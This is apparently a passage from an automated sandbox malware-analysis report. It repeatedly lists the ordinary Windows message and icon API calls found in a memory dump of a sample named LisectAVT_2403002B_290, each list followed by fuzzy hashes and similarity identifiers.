                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5E8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5F8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F600
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F60C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F61B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
                                                                                                                                                                                                                          • Instruction ID: 429cbd9149b55361b38364805ecf70f412a373ee621004217eed38f5c464dd76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3564a5d73e1706a2e47389451b451b82d68f2e53e33bc62a888cbd7b9e42f6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE042B1289614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA07
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA17
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA1F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA2B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA3A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
                                                                                                                                                                                                                          • Instruction ID: c72f6ad03f353f561a99e758367ef941d0c916186b8f8285fa4e34984247ba56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473b36df6f541bac8f595ccec7626f63c455e785c2d2d26d970966f2bfed7243
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E042B1289614BAF65117B05C4EFFA362DAB14B02F106520F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5A0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5B0
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F5B8
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F5C4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F5D3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
                                                                                                                                                                                                                          • Instruction ID: b6dd8b5b4e134736a0db0f6dc2b81ca2b1be5616f72a07522d348ec5361ba80b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58b99a24e225a215ec34d596c55b6635080be227acbca1fc0d235df464515e15
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DE042B1289614BAF65117B05C4EFFA362DAB14B02F106421F792E95D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F9BF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F9CF
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F9D7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F9E3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
                                                                                                                                                                                                                          • Instruction ID: d34a4e6785fcd5d8804060be10e08f5a13504dab63f5c32d185528fae42e6cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a42f5618b02dae5d81ff95cfd2331ef9782f7e5d76c9f1b005de485939b283e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E042B1689614BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA4F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FA5F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FA67
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FA73
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FA82
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
                                                                                                                                                                                                                          • Instruction ID: b7b077b0efbaa99d57c9e01e78f00ef8fa4a74ec0cbc48e40112d5a6e4ee9a6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efd2d74d83d920622d9b4420b2c5048c228e871b5561e64fec3fc43d6029cf99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E04CB12883047AF65017B05C4EFB6352DA714B01F106820B792E91D1CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000172), ref: 0040F288
                                                                                                                                                                                                                          • SendMessageA.USER32(C033FFFF,00000080,00000001,00000000), ref: 0040F298
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000172), ref: 0040F2A0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2AC
                                                                                                                                                                                                                          • SendMessageA.USER32(C033FFFF,00000080,00000000,00000000), ref: 0040F2BB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
                                                                                                                                                                                                                          • Instruction ID: d99028b12e30fd3fe39ac89642547f447b9f6d686350d1e6dd1f500a3f642d4a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93641fda4ea1c190c8fdc1416690265742e14c0d61ff617a7b54e2bac03fb871
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E0ECB12887107BF65017A05C4EFEA352CAB14B01F105120F792AA1D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F2D0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F2E0
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F2E8
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F2F4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F303
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
                                                                                                                                                                                                                          • Instruction ID: 6d76136d54f134a665c01184275cec0f141023eb7b6fb85ea418c97ed7197620
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b31f41dcf38431eb20b47a1d01738ebdc9c6014de1d4b334c6a8ea233e26116d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCE04CB12883047BF65017B05C4EFB6362DA714B01F106420B792E91D1CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FADF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAEF
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAF7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB03
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB12
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
                                                                                                                                                                                                                          • Instruction ID: b992e7cc074c589086062039aad7a199eea489cb61b4551384fa19084778ec30
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5b006b71caa7b31b3e4d514c68d06393cd2a06c7708e93191fda2f6d2418eba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEE04C712896147AF65117B05C4EFFA352DAB14B02F105520F796E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F6E3
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6F3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6FB
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F707
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F716
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
